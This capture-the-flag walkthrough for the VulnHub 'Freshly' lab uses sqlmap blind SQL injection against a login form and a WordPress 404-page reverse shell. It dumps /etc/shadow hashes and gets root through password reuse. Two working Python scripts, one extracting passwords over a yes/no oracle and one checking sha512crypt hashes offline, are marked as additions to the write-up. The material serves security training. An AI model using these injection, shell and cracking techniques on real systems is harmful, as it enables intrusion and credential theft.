TopHatSec: Freshly
Location
https://www.vulnhub.com/entry/tophatsec-freshly,118/
Description
The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. 🙂
There are a couple of different ways that you can go with this one. Good luck!
Enumeration
Because I need an entry point, I start with an nmap scan to discover open ports.
nmap -A -T4 -sV -p- 192.168.110.2
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-11 14:29 CEST
Nmap scan report for 888.darknet.com (192.168.110.2)
Host is up (0.013s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05
|_Not valid after:  2025-02-14T03:30:05
8080/tcp open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
Device type: bridge|general purpose
Running (JUST GUESSING): Oracle Virtualbox (96%), QEMU (95%)
OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
Aggressive OS guesses: Oracle Virtualbox (96%), QEMU user mode network gateway (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.26 ms 10.0.3.2
2   0.31 ms 888.darknet.com (192.168.110.2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.52 seconds
So ports 80, 443 and 8080 are open. I'll start with port 80.
"These are not the droids you're looking for". Always love that sentence! Is it a hint to look in /robots.txt? Nothing there.
nikto -h http://192.168.110.2/
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
SQL Injection
Two login pages. I try /login.php first: nothing of interest in the source code, and the HTTP headers show nothing of interest either. I inject a few single quotes hoping for an error, but nothing. I'll move on to login number 2 and in the meantime let sqlmap work on login number 1.
sqlmap -u "http://192.168.110.2/login.php/" --data="user=&password=&s=Submit" --random-agent --not-string="0" --level=5 --risk=3
Login number 2 is a phpMyAdmin page. When I try to log in, I get a response: a MySQL server.
Let's try some single quotes here too. I try different combinations, but I don't get the response I want. In the meantime I check on the running sqlmap and see that the first login page is vulnerable to time-based blind SQLi.
So I get the credentials of two users. Let's log in with the first user. Logging in with the known credentials gives a response on the page in the form of a '1'; bogus credentials give a '0'. That 1/0 difference is exactly the true/false oracle that --not-string="0" points sqlmap at, and it is much faster than waiting for time delays. Because there is nothing else to retrieve from this page, I let sqlmap dump the credentials from the phpmyadmin and wordpress8080 tables.
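The '1'/'0' response is a boolean oracle, and that is all sqlmap needs to pull whole tables out through a login form. As an added example that is not part of this write-up, the Python below reproduces the injectable query against a constructed in-memory SQLite table (the real backend is MySQL and its schema is not on the page, so the table and column names and the stored password are assumptions), recovers the password through nothing but yes/no answers by binary-searching each character's code point, and shows the parameterised query that closes the hole.

```python
import sqlite3

# Constructed stand-in for the challenge backend (assumption: the real
# login.php talks to MySQL and its schema is not on the page; only the
# "1" / "0" response behaviour is taken from the write-up).
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
_conn.execute("INSERT INTO users VALUES ('admin', 'SuperSecretPassword')")

STATS = {"requests": 0}   # how many "HTTP requests" the extraction needed


def vulnerable_login(user: str, password: str) -> str:
    """Mimics the injectable login.php: the POST fields are concatenated
    straight into the SQL string. Returns the page body, '1' or '0'."""
    STATS["requests"] += 1
    sql = ("SELECT COUNT(*) FROM users WHERE user = '%s' AND password = '%s'"
           % (user, password))
    try:
        (n,) = _conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "0"        # a broken query is rendered like a failed login
    return "1" if n else "0"


def safe_login(user: str, password: str) -> str:
    """Same check with a parameterised query: the input is data, never SQL."""
    (n,) = _conn.execute(
        "SELECT COUNT(*) FROM users WHERE user = ? AND password = ?",
        (user, password)).fetchone()
    return "1" if n else "0"


def ask(condition: str) -> bool:
    """Boolean oracle: True iff the page answers '1' for the injected
    condition. The trailing '-- ' comments out the password check."""
    user = "admin' AND (%s)-- " % condition
    return vulnerable_login(user, "irrelevant") == "1"


def bisect_int(expr: str, lo: int, hi: int) -> int:
    """Recover the integer value of SQL expression `expr`, known to lie in
    [lo, hi], with about log2(hi - lo) yes/no questions instead of one
    question per candidate value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask("(%s) > %d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(user: str, max_len: int = 64) -> str:
    """Pull one user's password out of the database through the 1/0 oracle.
    Returns '' when the user does not exist (every question answers '0')."""
    target = "(SELECT password FROM users WHERE user = '%s')" % user
    length = bisect_int("LENGTH(%s)" % target, 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # Comparing code points (UNICODE() here, ASCII()/ORD() on MySQL)
        # sidesteps MySQL's case-insensitive default collation and keeps
        # quote characters out of the payload.
        code = bisect_int("UNICODE(SUBSTR(%s, %d, 1))" % (target, pos), 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    secret = extract_password("admin")
    print("recovered %r in %d requests" % (secret, STATS["requests"]))
    print("vulnerable:", vulnerable_login("admin' OR '1'='1", "x"))
    print("fixed:     ", safe_login("admin' OR '1'='1", "x"))
```

With the binary search each character costs about seven requests rather than one per candidate character, which is also what sqlmap does; its time-based technique uses a SLEEP() delay as the oracle instead of the page body and pays that delay on every request, which is why telling it what a false answer looks like with --not-string is worth the trouble.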
When I visit the website on port 8080 there is a comment:
Nice Find!...Proceed
Again there is no robots.txt, and apart from a directory named /img/ (with a collection of pictures inside) nikto finds nothing. When I proceed I arrive at a WordPress site.
There is a comment on the page with a small reference to Star Wars again.
Hmm..... maybe you missed something ? --jedi mind tricks....
I don't think I missed anything, since I probably already have the credentials for the WordPress account. Time to use them.
WordPress
Getting a reverse shell
To get a reverse shell, I edit the theme's 404 page in the WordPress admin and replace its PHP with the php-reverse-shell from pentestmonkey. With a listener waiting, requesting any non-existent page on the site executes it.
And I’m in. Time to search around the system.
python -c 'import pty;pty.spawn("/bin/bash")'
daemon@Freshly:/$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
Ubuntu 14.04 with kernel 3.13.0-45. I know there is a privilege escalation for that kernel through overlayfs mounts inside user namespaces (CVE-2015-1328). The public exploit is C, so I need gcc on the box to build it. Let's see if it is available.
daemon@Freshly:/tmp$ compgen -c | grep -i "gcc"
compgen -c | grep -i "gcc"
daemon@Freshly:/tmp$
Nothing. Bummer. (Building the exploit statically on another i686 machine and uploading the binary would be the usual workaround.)
Time to move along and search some more.
daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = “NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!”
OK, that was a bit unexpected. I guess this wraps up the challenge, except that I don't have root and haven't really pwned the machine. Stopping now would leave me with an unsatisfying feeling.
daemon@Freshly:/home$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = “NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!”
That the unprivileged daemon account can read /etc/shadow at all is a finding in itself: on a stock Ubuntu system the file is mode 0640 and owned by root:shadow, and these hashes could have been fed to a cracker offline. After a really long time I instead tried the passwords stored in the database against the root account, and guess what? Passwords are reused in this challenge 🙂
daemon@Freshly:/$ su root
su root
Password: SuperSecretPassword
root@Freshly:/# id
id
uid=0(root) gid=0(root) groups=0(root)
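Password reuse is what finally gives root, and with the hashes in hand the same check can be done offline instead of typing each candidate into su. As an added example that is not part of the original write-up, the script below reimplements the SHA-512 crypt scheme (the $6$ prefix in the dump above) in pure Python on top of hashlib, because the stdlib crypt module is deprecated and was removed in Python 3.13, and runs a constructed candidate list (an assumption standing in for whatever sqlmap dumped) against the root, user and candycane lines copied from /etc/shadow above. The implementation is checked against glibc's published test vector for salt "saltstring" and password "Hello world!".

```python
import hashlib

# Shadow lines copied from the dump above; the other accounts are locked
# ('*' or '!' in the password field) so there is nothing to crack there.
SHADOW = """\
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
"""

# Constructed candidate list (assumption): whatever sqlmap dumped from the
# phpmyadmin / wordpress8080 tables would go here.
CANDIDATES = ["SuperSecretPassword", "password", "candycane", "wordpress"]

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _b64_from_24bit(b2: int, b1: int, b0: int, n: int) -> str:
    """crypt(3)'s little-endian base64: n characters from a 24-bit word."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(ITOA64[w & 0x3F])
        w >>= 6
    return "".join(out)


def sha512_crypt(password: bytes, salt: bytes, rounds: int = 5000) -> str:
    """Ulrich Drepper's SHA-512 crypt ($6$), step for step as in glibc."""
    salt = salt[:16]
    plen, slen = len(password), len(salt)
    sha = lambda data: hashlib.sha512(data).digest()

    b = sha(password + salt + password)                 # digest B
    ctx = hashlib.sha512(password + salt)               # digest A starts with key+salt,
    ctx.update(b * (plen // 64) + b[:plen % 64])        # then B cut to the key length,
    n = plen
    while n > 0:                                        # then B or key per bit of len(key)
        ctx.update(b if n & 1 else password)
        n >>= 1
    a = ctx.digest()

    dp = sha(password * plen)                           # P: key-derived byte sequence
    p = dp * (plen // 64) + dp[:plen % 64]
    ds = sha(salt * (16 + a[0]))                        # S: salt-derived byte sequence
    s = ds * (slen // 64) + ds[:slen % 64]

    c = a                                               # the cost loop
    for r in range(rounds):
        ctx = hashlib.sha512(p if r & 1 else c)
        if r % 3:
            ctx.update(s)
        if r % 7:
            ctx.update(p)
        ctx.update(c if r & 1 else p)
        c = ctx.digest()

    out = []                                            # glibc's fixed byte permutation
    for i in range(21):
        idx = [i, i + 21, i + 42]
        rot = i % 3
        idx = idx[rot:] + idx[:rot]
        out.append(_b64_from_24bit(c[idx[0]], c[idx[1]], c[idx[2]], 4))
    out.append(_b64_from_24bit(0, 0, c[63], 2))
    prefix = "$6$" if rounds == 5000 else "$6$rounds=%d$" % rounds
    return prefix + salt.decode() + "$" + "".join(out)


def verify(shadow_hash: str, password: str) -> bool:
    """Check a clear-text password against one $6$salt$hash field."""
    fields = shadow_hash.split("$")
    if len(fields) != 4 or fields[1] != "6":
        raise ValueError("only plain $6$ (sha512crypt) hashes are handled")
    return sha512_crypt(password.encode(), fields[2].encode()) == shadow_hash


def find_reuse(shadow: str, candidates) -> dict:
    """Map each crackable account to the first candidate that matches."""
    hits = {}
    for line in shadow.splitlines():
        name, field = line.split(":")[:2]
        if not field.startswith("$6$"):
            continue                           # locked or non-sha512crypt entry
        for cand in candidates:
            if verify(field, cand):
                hits[name] = cand
                break
    return hits


if __name__ == "__main__":
    for user, pw in find_reuse(SHADOW, CANDIDATES).items():
        print("%s reuses %r" % (user, pw))
```

Each verification costs 5000 SHA-512 rounds, which is cheap for a handful of database passwords but is the reason a real wordlist attack belongs in john or hashcat rather than in Python.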
Now I can close this challenge with a satisfied feeling.
Good work on making this challenge.